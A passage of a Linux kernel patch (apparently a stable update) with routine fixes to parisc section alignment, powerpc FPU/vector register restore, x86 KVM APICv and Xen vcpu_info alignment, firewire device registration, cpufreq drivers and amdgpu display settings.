++	.section .altinstructions, "a"	!	\
++	.align 4			!	\
+ 	.word (from - .)		!	\
+ 	.hword -num_instructions, cond	!	\
+ 	.word (new_instr_ptr - .)	!	\
+diff --git a/arch/parisc/include/asm/assembly.h b/arch/parisc/include/asm/assembly.h
+index 75677b526b2bb..74d17d7e759da 100644
+--- a/arch/parisc/include/asm/assembly.h
++++ b/arch/parisc/include/asm/assembly.h
+@@ -574,6 +574,7 @@
+ 	 */
+ #define ASM_EXCEPTIONTABLE_ENTRY(fault_addr, except_addr)	\
+ 	.section __ex_table,"aw"			!	\
++	.align 4					!	\
+ 	.word (fault_addr - .), (except_addr - .)	!	\
+ 	.previous
+ 
+diff --git a/arch/parisc/include/asm/bug.h b/arch/parisc/include/asm/bug.h
+index 4b6d60b941247..b9cad0bb4461b 100644
+--- a/arch/parisc/include/asm/bug.h
++++ b/arch/parisc/include/asm/bug.h
+@@ -28,13 +28,15 @@
+ 	do {								\
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+-			     "\t.pushsection __bug_table,\"aw\"\n"	\
++			     "\t.pushsection __bug_table,\"a\"\n"	\
++			     "\t.align %4\n"				\
+ 			     "2:\t" ASM_WORD_INSN "1b, %c0\n"		\
+-			     "\t.short %c1, %c2\n"			\
+-			     "\t.org 2b+%c3\n"				\
++			     "\t.short %1, %2\n"			\
++			     "\t.blockz %3-2*%4-2*2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (__FILE__), "i" (__LINE__),	\
+-			     "i" (0), "i" (sizeof(struct bug_entry)) ); \
++			     "i" (0), "i" (sizeof(struct bug_entry)),	\
++			     "i" (sizeof(long)) );			\
+ 		unreachable();						\
+ 	} while(0)
+ 
+@@ -51,27 +53,31 @@
+ 	do {								\
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+-			     "\t.pushsection __bug_table,\"aw\"\n"	\
++			     "\t.pushsection __bug_table,\"a\"\n"	\
++			     "\t.align %4\n"				\
+ 			     "2:\t" ASM_WORD_INSN "1b, %c0\n"		\
+-			     "\t.short %c1, %c2\n"			\
+-			     "\t.org 2b+%c3\n"				\
++			     "\t.short %1, %2\n"			\
++			     "\t.blockz %3-2*%4-2*2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (__FILE__), "i" (__LINE__),	\
+ 			     "i" (BUGFLAG_WARNING|(flags)),		\
+-			     "i" (sizeof(struct bug_entry)) );		\
++			     "i" (sizeof(struct bug_entry)),		\
++			     "i" (sizeof(long)) );			\
+ 	} while(0)
+ #else
+ #define __WARN_FLAGS(flags)						\
+ 	do {								\
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+-			     "\t.pushsection __bug_table,\"aw\"\n"	\
++			     "\t.pushsection __bug_table,\"a\"\n"	\
++			     "\t.align %2\n"				\
+ 			     "2:\t" ASM_WORD_INSN "1b\n"		\
+-			     "\t.short %c0\n"				\
+-			     "\t.org 2b+%c1\n"				\
++			     "\t.short %0\n"				\
++			     "\t.blockz %1-%2-2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (BUGFLAG_WARNING|(flags)),		\
+-			     "i" (sizeof(struct bug_entry)) );		\
++			     "i" (sizeof(struct bug_entry)),		\
++			     "i" (sizeof(long)) );			\
+ 	} while(0)
+ #endif
+ 
+diff --git a/arch/parisc/include/asm/jump_label.h b/arch/parisc/include/asm/jump_label.h
+index af2a598bc0f81..94428798b6aa6 100644
+--- a/arch/parisc/include/asm/jump_label.h
++++ b/arch/parisc/include/asm/jump_label.h
+@@ -15,10 +15,12 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 	asm_volatile_goto("1:\n\t"
+ 		 "nop\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
++		 ".align %1\n\t"
+ 		 ".word 1b - ., %l[l_yes] - .\n\t"
+ 		 __stringify(ASM_ULONG_INSN) " %c0 - .\n\t"
+ 		 ".popsection\n\t"
+-		 : :  "i" (&((char *)key)[branch]) :  : l_yes);
++		 : : "i" (&((char *)key)[branch]), "i" (sizeof(long))
++		 : : l_yes);
+ 
+ 	return false;
+ l_yes:
+@@ -30,10 +32,12 @@ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool
+ 	asm_volatile_goto("1:\n\t"
+ 		 "b,n %l[l_yes]\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
++		 ".align %1\n\t"
+ 		 ".word 1b - ., %l[l_yes] - .\n\t"
+ 		 __stringify(ASM_ULONG_INSN) " %c0 - .\n\t"
+ 		 ".popsection\n\t"
+-		 : :  "i" (&((char *)key)[branch]) :  : l_yes);
++		 : : "i" (&((char *)key)[branch]), "i" (sizeof(long))
++		 : : l_yes);
+ 
+ 	return false;
+ l_yes:
+diff --git a/arch/parisc/include/asm/ldcw.h b/arch/parisc/include/asm/ldcw.h
+index 10a061d6899cd..883a9ddbb6770 100644
+--- a/arch/parisc/include/asm/ldcw.h
++++ b/arch/parisc/include/asm/ldcw.h
+@@ -56,7 +56,7 @@
+ })
+ 
+ #ifdef CONFIG_SMP
+-# define __lock_aligned __section(".data..lock_aligned")
++# define __lock_aligned __section(".data..lock_aligned") __aligned(16)
+ #endif
+ 
+ #endif /* __PARISC_LDCW_H */
+diff --git a/arch/parisc/include/asm/uaccess.h b/arch/parisc/include/asm/uaccess.h
+index 2bf660eabe421..4165079898d9e 100644
+--- a/arch/parisc/include/asm/uaccess.h
++++ b/arch/parisc/include/asm/uaccess.h
+@@ -41,6 +41,7 @@ struct exception_table_entry {
+ 
+ #define ASM_EXCEPTIONTABLE_ENTRY( fault_addr, except_addr )\
+ 	".section __ex_table,\"aw\"\n"			   \
++	".align 4\n"					   \
+ 	".word (" #fault_addr " - .), (" #except_addr " - .)\n\t" \
+ 	".previous\n"
+ 
+diff --git a/arch/parisc/include/uapi/asm/errno.h b/arch/parisc/include/uapi/asm/errno.h
+index 87245c584784e..8d94739d75c67 100644
+--- a/arch/parisc/include/uapi/asm/errno.h
++++ b/arch/parisc/include/uapi/asm/errno.h
+@@ -75,7 +75,6 @@
+ 
+ /* We now return you to your regularly scheduled HPUX. */
+ 
+-#define ENOSYM		215	/* symbol does not exist in executable */
+ #define	ENOTSOCK	216	/* Socket operation on non-socket */
+ #define	EDESTADDRREQ	217	/* Destination address required */
+ #define	EMSGSIZE	218	/* Message too long */
+@@ -101,7 +100,6 @@
+ #define	ETIMEDOUT	238	/* Connection timed out */
+ #define	ECONNREFUSED	239	/* Connection refused */
+ #define	EREFUSED	ECONNREFUSED	/* for HP's NFS apparently */
+-#define	EREMOTERELEASE	240	/* Remote peer released connection */
+ #define	EHOSTDOWN	241	/* Host is down */
+ #define	EHOSTUNREACH	242	/* No route to host */
+ 
+diff --git a/arch/parisc/kernel/vmlinux.lds.S b/arch/parisc/kernel/vmlinux.lds.S
+index 2769eb991f58d..ad3a3239ea74b 100644
+--- a/arch/parisc/kernel/vmlinux.lds.S
++++ b/arch/parisc/kernel/vmlinux.lds.S
+@@ -131,6 +131,7 @@ SECTIONS
+ 	RO_DATA(8)
+ 
+ 	/* unwind info */
++	. = ALIGN(4);
+ 	.PARISC.unwind : {
+ 		__start___unwind = .;
+ 		*(.PARISC.unwind)
+diff --git a/arch/powerpc/kernel/fpu.S b/arch/powerpc/kernel/fpu.S
+index f71f2bbd4de64..9854364e599c1 100644
+--- a/arch/powerpc/kernel/fpu.S
++++ b/arch/powerpc/kernel/fpu.S
+@@ -23,6 +23,15 @@
+ #include <asm/feature-fixups.h>
+ 
+ #ifdef CONFIG_VSX
++#define __REST_1FPVSR(n,c,base)						\
++BEGIN_FTR_SECTION							\
++	b	2f;							\
++END_FTR_SECTION_IFSET(CPU_FTR_VSX);					\
++	REST_FPR(n,base);						\
++	b	3f;							\
++2:	REST_VSR(n,c,base);						\
++3:
++
+ #define __REST_32FPVSRS(n,c,base)					\
+ BEGIN_FTR_SECTION							\
+ 	b	2f;							\
+@@ -41,9 +50,11 @@ END_FTR_SECTION_IFSET(CPU_FTR_VSX);					\
+ 2:	SAVE_32VSRS(n,c,base);						\
+ 3:
+ #else
++#define __REST_1FPVSR(n,b,base)		REST_FPR(n, base)
+ #define __REST_32FPVSRS(n,b,base)	REST_32FPRS(n, base)
+ #define __SAVE_32FPVSRS(n,b,base)	SAVE_32FPRS(n, base)
+ #endif
++#define REST_1FPVSR(n,c,base)   __REST_1FPVSR(n,__REG_##c,__REG_##base)
+ #define REST_32FPVSRS(n,c,base) __REST_32FPVSRS(n,__REG_##c,__REG_##base)
+ #define SAVE_32FPVSRS(n,c,base) __SAVE_32FPVSRS(n,__REG_##c,__REG_##base)
+ 
+@@ -67,6 +78,7 @@ _GLOBAL(store_fp_state)
+ 	SAVE_32FPVSRS(0, R4, R3)
+ 	mffs	fr0
+ 	stfd	fr0,FPSTATE_FPSCR(r3)
++	REST_1FPVSR(0, R4, R3)
+ 	blr
+ EXPORT_SYMBOL(store_fp_state)
+ 
+@@ -138,4 +150,5 @@ _GLOBAL(save_fpu)
+ 2:	SAVE_32FPVSRS(0, R4, R6)
+ 	mffs	fr0
+ 	stfd	fr0,FPSTATE_FPSCR(r6)
++	REST_1FPVSR(0, R4, R6)
+ 	blr
+diff --git a/arch/powerpc/kernel/process.c b/arch/powerpc/kernel/process.c
+index 67da147fe34dc..f2cbad5228811 100644
+--- a/arch/powerpc/kernel/process.c
++++ b/arch/powerpc/kernel/process.c
+@@ -1163,11 +1163,11 @@ void kvmppc_save_user_regs(void)
+ 
+ 	usermsr = current->thread.regs->msr;
+ 
++	/* Caller has enabled FP/VEC/VSX/TM in MSR */
+ 	if (usermsr & MSR_FP)
+-		save_fpu(current);
+-
++		__giveup_fpu(current);
+ 	if (usermsr & MSR_VEC)
+-		save_altivec(current);
++		__giveup_altivec(current);
+ 
+ #ifdef CONFIG_PPC_TRANSACTIONAL_MEM
+ 	if (usermsr & MSR_TM) {
+diff --git a/arch/powerpc/kernel/vector.S b/arch/powerpc/kernel/vector.S
+index 5cf64740edb82..99c1e70841ea2 100644
+--- a/arch/powerpc/kernel/vector.S
++++ b/arch/powerpc/kernel/vector.S
+@@ -32,6 +32,7 @@ _GLOBAL(store_vr_state)
+ 	mfvscr	v0
+ 	li	r4, VRSTATE_VSCR
+ 	stvx	v0, r4, r3
++	lvx	v0, 0, r3
+ 	blr
+ EXPORT_SYMBOL(store_vr_state)
+ 
+@@ -108,6 +109,7 @@ _GLOBAL(save_altivec)
+ 	mfvscr	v0
+ 	li	r4,VRSTATE_VSCR
+ 	stvx	v0,r4,r7
++	lvx	v0,0,r7
+ 	blr
+ 
+ #ifdef CONFIG_VSX
+diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
+index 6c2826417b337..93c60c0c9d4a7 100644
+--- a/arch/x86/entry/common.c
++++ b/arch/x86/entry/common.c
+@@ -294,7 +294,7 @@ static void __xen_pv_evtchn_do_upcall(struct pt_regs *regs)
+ 
+ 	inc_irq_stat(irq_hv_callback_count);
+ 
+-	xen_hvm_evtchn_do_upcall();
++	xen_evtchn_do_upcall();
+ 
+ 	set_irq_regs(old_regs);
+ }
+diff --git a/arch/x86/include/asm/kvm-x86-ops.h b/arch/x86/include/asm/kvm-x86-ops.h
+index 2c6698aa218b1..abc07d0045897 100644
+--- a/arch/x86/include/asm/kvm-x86-ops.h
++++ b/arch/x86/include/asm/kvm-x86-ops.h
+@@ -106,6 +106,7 @@ KVM_X86_OP_OPTIONAL(vcpu_blocking)
+ KVM_X86_OP_OPTIONAL(vcpu_unblocking)
+ KVM_X86_OP_OPTIONAL(pi_update_irte)
+ KVM_X86_OP_OPTIONAL(pi_start_assignment)
++KVM_X86_OP_OPTIONAL(apicv_pre_state_restore)
+ KVM_X86_OP_OPTIONAL(apicv_post_state_restore)
+ KVM_X86_OP_OPTIONAL_RET0(dy_apicv_has_pending_interrupt)
+ KVM_X86_OP_OPTIONAL(set_hv_timer)
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index c1dcaa3d2d6eb..dfcdcafe3a2cd 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1603,6 +1603,7 @@ struct kvm_x86_ops {
+ 	int (*pi_update_irte)(struct kvm *kvm, unsigned int host_irq,
+ 			      uint32_t guest_irq, bool set);
+ 	void (*pi_start_assignment)(struct kvm *kvm);
++	void (*apicv_pre_state_restore)(struct kvm_vcpu *vcpu);
+ 	void (*apicv_post_state_restore)(struct kvm_vcpu *vcpu);
+ 	bool (*dy_apicv_has_pending_interrupt)(struct kvm_vcpu *vcpu);
+ 
+diff --git a/arch/x86/kernel/apic/msi.c b/arch/x86/kernel/apic/msi.c
+index 7517eb05bdc1a..ab348aec86632 100644
+--- a/arch/x86/kernel/apic/msi.c
++++ b/arch/x86/kernel/apic/msi.c
+@@ -55,14 +55,14 @@ msi_set_affinity(struct irq_data *irqd, const struct cpumask *mask, bool force)
+ 	 * caused by the non-atomic update of the address/data pair.
+ 	 *
+ 	 * Direct update is possible when:
+-	 * - The MSI is maskable (remapped MSI does not use this code path)).
+-	 *   The quirk bit is not set in this case.
++	 * - The MSI is maskable (remapped MSI does not use this code path).
++	 *   The reservation mode bit is set in this case.
+ 	 * - The new vector is the same as the old vector
+ 	 * - The old vector is MANAGED_IRQ_SHUTDOWN_VECTOR (interrupt starts up)
+ 	 * - The interrupt is not yet started up
+ 	 * - The new destination CPU is the same as the old destination CPU
+ 	 */
+-	if (!irqd_msi_nomask_quirk(irqd) ||
++	if (!irqd_can_reserve(irqd) ||
+ 	    cfg->vector == old_cfg.vector ||
+ 	    old_cfg.vector == MANAGED_IRQ_SHUTDOWN_VECTOR ||
+ 	    !irqd_is_started(irqd) ||
+@@ -202,8 +202,6 @@ struct irq_domain * __init native_create_pci_msi_domain(void)
+ 	if (!d) {
+ 		irq_domain_free_fwnode(fn);
+ 		pr_warn("Failed to initialize PCI-MSI irqdomain.\n");
+-	} else {
+-		d->flags |= IRQ_DOMAIN_MSI_NOMASK_QUIRK;
+ 	}
+ 	return d;
+ }
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index 4dba0a84ba2f3..edcf45e312b99 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2446,6 +2446,8 @@ void kvm_lapic_reset(struct kvm_vcpu *vcpu, bool init_event)
+ 	u64 msr_val;
+ 	int i;
+ 
++	static_call_cond(kvm_x86_apicv_pre_state_restore)(vcpu);
++
+ 	if (!init_event) {
+ 		msr_val = APIC_DEFAULT_PHYS_BASE | MSR_IA32_APICBASE_ENABLE;
+ 		if (kvm_vcpu_is_reset_bsp(vcpu))
+@@ -2757,6 +2759,8 @@ int kvm_apic_set_state(struct kvm_vcpu *vcpu, struct kvm_lapic_state *s)
+ 	struct kvm_lapic *apic = vcpu->arch.apic;
+ 	int r;
+ 
++	static_call_cond(kvm_x86_apicv_pre_state_restore)(vcpu);
++
+ 	kvm_lapic_set_base(vcpu, vcpu->arch.apic_base);
+ 	/* set SPIV separately to get count of SW disabled APICs right */
+ 	apic_set_spiv(apic, *((u32 *)(s->regs + APIC_SPIV)));
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 31a10d774df6d..98d732b9418f1 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -6799,7 +6799,7 @@ static void vmx_load_eoi_exitmap(struct kvm_vcpu *vcpu, u64 *eoi_exit_bitmap)
+ 	vmcs_write64(EOI_EXIT_BITMAP3, eoi_exit_bitmap[3]);
+ }
+ 
+-static void vmx_apicv_post_state_restore(struct kvm_vcpu *vcpu)
++static void vmx_apicv_pre_state_restore(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_vmx *vmx = to_vmx(vcpu);
+ 
+@@ -8172,7 +8172,7 @@ static struct kvm_x86_ops vmx_x86_ops __initdata = {
+ 	.set_apic_access_page_addr = vmx_set_apic_access_page_addr,
+ 	.refresh_apicv_exec_ctrl = vmx_refresh_apicv_exec_ctrl,
+ 	.load_eoi_exitmap = vmx_load_eoi_exitmap,
+-	.apicv_post_state_restore = vmx_apicv_post_state_restore,
++	.apicv_pre_state_restore = vmx_apicv_pre_state_restore,
+ 	.check_apicv_inhibit_reasons = vmx_check_apicv_inhibit_reasons,
+ 	.hwapic_irr_update = vmx_hwapic_irr_update,
+ 	.hwapic_isr_update = vmx_hwapic_isr_update,
+diff --git a/arch/x86/xen/enlighten.c b/arch/x86/xen/enlighten.c
+index b8db2148c07d5..3c61bb98c10e2 100644
+--- a/arch/x86/xen/enlighten.c
++++ b/arch/x86/xen/enlighten.c
+@@ -32,10 +32,13 @@ EXPORT_SYMBOL_GPL(hypercall_page);
+  * &HYPERVISOR_shared_info->vcpu_info[cpu]. See xen_hvm_init_shared_info
+  * and xen_vcpu_setup for details. By default it points to share_info->vcpu_info
+  * but during boot it is switched to point to xen_vcpu_info.
+- * The pointer is used in __xen_evtchn_do_upcall to acknowledge pending events.
++ * The pointer is used in xen_evtchn_do_upcall to acknowledge pending events.
++ * Make sure that xen_vcpu_info doesn't cross a page boundary by making it
++ * cache-line aligned (the struct is guaranteed to have a size of 64 bytes,
++ * which matches the cache line size of 64-bit x86 processors).
+  */
+ DEFINE_PER_CPU(struct vcpu_info *, xen_vcpu);
+-DEFINE_PER_CPU(struct vcpu_info, xen_vcpu_info);
++DEFINE_PER_CPU_ALIGNED(struct vcpu_info, xen_vcpu_info);
+ 
+ /* Linux <-> Xen vCPU id mapping */
+ DEFINE_PER_CPU(uint32_t, xen_vcpu_id);
+@@ -160,6 +163,7 @@ void xen_vcpu_setup(int cpu)
+ 	int err;
+ 	struct vcpu_info *vcpup;
+ 
++	BUILD_BUG_ON(sizeof(*vcpup) > SMP_CACHE_BYTES);
+ 	BUG_ON(HYPERVISOR_shared_info == &xen_dummy_shared_info);
+ 
+ 	/*
+diff --git a/arch/x86/xen/enlighten_hvm.c b/arch/x86/xen/enlighten_hvm.c
+index c1cd28e915a3a..c66807dd02703 100644
+--- a/arch/x86/xen/enlighten_hvm.c
++++ b/arch/x86/xen/enlighten_hvm.c
+@@ -136,7 +136,7 @@ DEFINE_IDTENTRY_SYSVEC(sysvec_xen_hvm_callback)
+ 
+ 	inc_irq_stat(irq_hv_callback_count);
+ 
+-	xen_hvm_evtchn_do_upcall();
++	xen_evtchn_do_upcall();
+ 
+ 	set_irq_regs(old_regs);
+ }
+diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
+index a10903785a338..b2b2f4315b78d 100644
+--- a/arch/x86/xen/xen-ops.h
++++ b/arch/x86/xen/xen-ops.h
+@@ -21,7 +21,7 @@ extern void *xen_initial_gdt;
+ struct trap_info;
+ void xen_copy_trap_info(struct trap_info *traps);
+ 
+-DECLARE_PER_CPU(struct vcpu_info, xen_vcpu_info);
++DECLARE_PER_CPU_ALIGNED(struct vcpu_info, xen_vcpu_info);
+ DECLARE_PER_CPU(unsigned long, xen_cr3);
+ DECLARE_PER_CPU(unsigned long, xen_current_cr3);
+ 
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index e614eb3355d39..a9da2f05e6297 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -1086,9 +1086,14 @@ int ata_scsi_dev_config(struct scsi_device *sdev, struct ata_device *dev)
+ 		 * Ask the sd driver to issue START STOP UNIT on runtime suspend
+ 		 * and resume and shutdown only. For system level suspend/resume,
+ 		 * devices power state is handled directly by libata EH.
++		 * Given that disks are always spun up on system resume, also
++		 * make sure that the sd driver forces runtime suspended disks
++		 * to be resumed to correctly reflect the power state of the
++		 * device.
+ 		 */
+-		sdev->manage_runtime_start_stop = true;
+-		sdev->manage_shutdown = true;
++		sdev->manage_runtime_start_stop = 1;
++		sdev->manage_shutdown = 1;
++		sdev->force_runtime_start_on_system_start = 1;
+ 	}
+ 
+ 	/*
+diff --git a/drivers/auxdisplay/hd44780_common.c b/drivers/auxdisplay/hd44780_common.c
+index 3934c2eebf33d..7cbf375b0fa5e 100644
+--- a/drivers/auxdisplay/hd44780_common.c
++++ b/drivers/auxdisplay/hd44780_common.c
+@@ -82,7 +82,15 @@ int hd44780_common_clear_display(struct charlcd *lcd)
+ 	hdc->write_cmd(hdc, LCD_CMD_DISPLAY_CLEAR);
+ 	/* datasheet says to wait 1,64 milliseconds */
+ 	long_sleep(2);
+-	return 0;
++
++	/*
++	 * The Hitachi HD44780 controller (and compatible ones) reset the DDRAM
++	 * address when executing the DISPLAY_CLEAR command, thus the
++	 * following call is not required. However, other controllers do not
++	 * (e.g. NewHaven NHD-0220DZW-AG5), thus move the cursor to home
++	 * unconditionally to support both.
++	 */
++	return hd44780_common_home(lcd);
+ }
+ EXPORT_SYMBOL_GPL(hd44780_common_clear_display);
+ 
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index f8d2bba9173d8..edc294ee5a5bc 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -296,7 +296,9 @@ static int amd_pstate_target(struct cpufreq_policy *policy,
+ static unsigned int amd_pstate_fast_switch(struct cpufreq_policy *policy,
+ 				  unsigned int target_freq)
+ {
+-	return amd_pstate_update_freq(policy, target_freq, true);
++	if (!amd_pstate_update_freq(policy, target_freq, true))
++		return target_freq;
++	return policy->cur;
+ }
+ 
+ static void amd_pstate_adjust_perf(unsigned int cpu,
+diff --git a/drivers/cpufreq/imx6q-cpufreq.c b/drivers/cpufreq/imx6q-cpufreq.c
+index ad4ce84931446..925fc17eaacb2 100644
+--- a/drivers/cpufreq/imx6q-cpufreq.c
++++ b/drivers/cpufreq/imx6q-cpufreq.c
+@@ -209,6 +209,14 @@ static struct cpufreq_driver imx6q_cpufreq_driver = {
+ 	.suspend = cpufreq_generic_suspend,
+ };
+ 
++static void imx6x_disable_freq_in_opp(struct device *dev, unsigned long freq)
++{
++	int ret = dev_pm_opp_disable(dev, freq);
++
++	if (ret < 0 && ret != -ENODEV)
++		dev_warn(dev, "failed to disable %ldMHz OPP\n", freq / 1000000);
++}
++
+ #define OCOTP_CFG3			0x440
+ #define OCOTP_CFG3_SPEED_SHIFT		16
+ #define OCOTP_CFG3_SPEED_1P2GHZ		0x3
+@@ -254,17 +262,15 @@ static int imx6q_opp_check_speed_grading(struct device *dev)
+ 	val &= 0x3;
+ 
+ 	if (val < OCOTP_CFG3_SPEED_996MHZ)
+-		if (dev_pm_opp_disable(dev, 996000000))
+-			dev_warn(dev, "failed to disable 996MHz OPP\n");
++		imx6x_disable_freq_in_opp(dev, 996000000);
+ 
+ 	if (of_machine_is_compatible("fsl,imx6q") ||
+ 	    of_machine_is_compatible("fsl,imx6qp")) {
+ 		if (val != OCOTP_CFG3_SPEED_852MHZ)
+-			if (dev_pm_opp_disable(dev, 852000000))
+-				dev_warn(dev, "failed to disable 852MHz OPP\n");
++			imx6x_disable_freq_in_opp(dev, 852000000);
++
+ 		if (val != OCOTP_CFG3_SPEED_1P2GHZ)
+-			if (dev_pm_opp_disable(dev, 1200000000))
+-				dev_warn(dev, "failed to disable 1.2GHz OPP\n");
++			imx6x_disable_freq_in_opp(dev, 1200000000);
+ 	}
+ 
+ 	return 0;
+@@ -316,20 +322,16 @@ static int imx6ul_opp_check_speed_grading(struct device *dev)
+ 	val >>= OCOTP_CFG3_SPEED_SHIFT;
+ 	val &= 0x3;
+ 
+-	if (of_machine_is_compatible("fsl,imx6ul")) {
++	if (of_machine_is_compatible("fsl,imx6ul"))
+ 		if (val != OCOTP_CFG3_6UL_SPEED_696MHZ)
+-			if (dev_pm_opp_disable(dev, 696000000))
+-				dev_warn(dev, "failed to disable 696MHz OPP\n");
+-	}
++			imx6x_disable_freq_in_opp(dev, 696000000);
+ 
+ 	if (of_machine_is_compatible("fsl,imx6ull")) {
+-		if (val != OCOTP_CFG3_6ULL_SPEED_792MHZ)
+-			if (dev_pm_opp_disable(dev, 792000000))
+-				dev_warn(dev, "failed to disable 792MHz OPP\n");
++		if (val < OCOTP_CFG3_6ULL_SPEED_792MHZ)
++			imx6x_disable_freq_in_opp(dev, 792000000);
+ 
+ 		if (val != OCOTP_CFG3_6ULL_SPEED_900MHZ)
+-			if (dev_pm_opp_disable(dev, 900000000))
+-				dev_warn(dev, "failed to disable 900MHz OPP\n");
++			imx6x_disable_freq_in_opp(dev, 900000000);
+ 	}
+ 
+ 	return ret;
+diff --git a/drivers/dma-buf/dma-resv.c b/drivers/dma-buf/dma-resv.c
+index f1ba71aed33c3..e78ff9333c7a3 100644
+--- a/drivers/dma-buf/dma-resv.c
++++ b/drivers/dma-buf/dma-resv.c
+@@ -296,7 +296,7 @@ void dma_resv_add_fence(struct dma_resv *obj, struct dma_fence *fence,
+ 
+ 		dma_resv_list_entry(fobj, i, obj, &old, &old_usage);
+ 		if ((old->context == fence->context && old_usage >= usage &&
+-		     dma_fence_is_later(fence, old)) ||
++		     dma_fence_is_later_or_same(fence, old)) ||
+ 		    dma_fence_is_signaled(old)) {
+ 			dma_resv_list_set(fobj, i, fence, usage);
+ 			dma_fence_put(old);
+diff --git a/drivers/firewire/core-device.c b/drivers/firewire/core-device.c
+index adddd8c45d0c1..74bab06283b71 100644
+--- a/drivers/firewire/core-device.c
++++ b/drivers/firewire/core-device.c
+@@ -717,14 +717,11 @@ static void create_units(struct fw_device *device)
+ 					fw_unit_attributes,
+ 					&unit->attribute_group);
+ 
+-		if (device_register(&unit->device) < 0)
+-			goto skip_unit;
+-
+ 		fw_device_get(device);
+-		continue;
+-
+-	skip_unit:
+-		kfree(unit);
++		if (device_register(&unit->device) < 0) {
++			put_device(&unit->device);
++			continue;
++		}
+ 	}
+ }
+ 
+diff --git a/drivers/firewire/sbp2.c b/drivers/firewire/sbp2.c
+index 7ad2e03afd4e5..234cd17fdee13 100644
+--- a/drivers/firewire/sbp2.c
++++ b/drivers/firewire/sbp2.c
+@@ -1519,9 +1519,9 @@ static int sbp2_scsi_slave_configure(struct scsi_device *sdev)
+ 	sdev->use_10_for_rw = 1;
+ 
+ 	if (sbp2_param_exclusive_login) {
+-		sdev->manage_system_start_stop = true;
+-		sdev->manage_runtime_start_stop = true;
+-		sdev->manage_shutdown = true;
++		sdev->manage_system_start_stop = 1;
++		sdev->manage_runtime_start_stop = 1;
++		sdev->manage_shutdown = 1;
+ 	}
+ 
+ 	if (sdev->type == TYPE_ROM)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 6e5bc74846952..b9983ca99eb7d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2200,6 +2200,8 @@ retry_init:
+ 		pm_runtime_mark_last_busy(ddev->dev);
+ 		pm_runtime_put_autosuspend(ddev->dev);
+ 
++		pci_wake_from_d3(pdev, TRUE);
++
+ 		/*
+ 		 * For runpm implemented via BACO, PMFW will handle the
+ 		 * timing for BACO in and out:
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index bc65fc1350f9a..23e7e5126eae6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -82,6 +82,10 @@ MODULE_FIRMWARE("amdgpu/gc_11_0_4_me.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_4_mec.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_4_rlc.bin");
+ 
++static const struct soc15_reg_golden golden_settings_gc_11_0[] = {
++	SOC15_REG_GOLDEN_VALUE(GC, 0, regTCP_CNTL, 0x20000000, 0x20000000)
++};
++
+ static const struct soc15_reg_golden golden_settings_gc_11_0_1[] =
+ {
+ 	SOC15_REG_GOLDEN_VALUE(GC, 0, regCGTT_GS_NGG_CLK_CTRL, 0x9fff8fff, 0x00000010),
+@@ -274,6 +278,10 @@ static void gfx_v11_0_init_golden_registers(struct amdgpu_device *adev)
+ 	default:
+ 		break;
+ 	}
++	soc15_program_register_sequence(adev,
++					golden_settings_gc_11_0,
++					(const u32)ARRAY_SIZE(golden_settings_gc_11_0));
++
+ }
+ 
+ static void gfx_v11_0_write_data_to_reg(struct amdgpu_ring *ring, int eng_sel,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 001932cb813dc..6d5f3c5fb4a62 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -6149,7 +6149,7 @@ int amdgpu_dm_connector_atomic_set_property(struct drm_connector *connector,
+ 		dm_new_state->underscan_enable = val;
+ 		ret = 0;
+ 	} else if (property == adev->mode_info.abm_level_property) {
+-		dm_new_state->abm_level = val;
++		dm_new_state->abm_level = val ?: ABM_LEVEL_IMMEDIATE_DISABLE;
+ 		ret = 0;
+ 	}
+ 
+@@ -6194,7 +6194,8 @@ int amdgpu_dm_connector_atomic_get_property(struct drm_connector *connector,
+ 		*val = dm_state->underscan_enable;
+ 		ret = 0;
+ 	} else if (property == adev->mode_info.abm_level_property) {
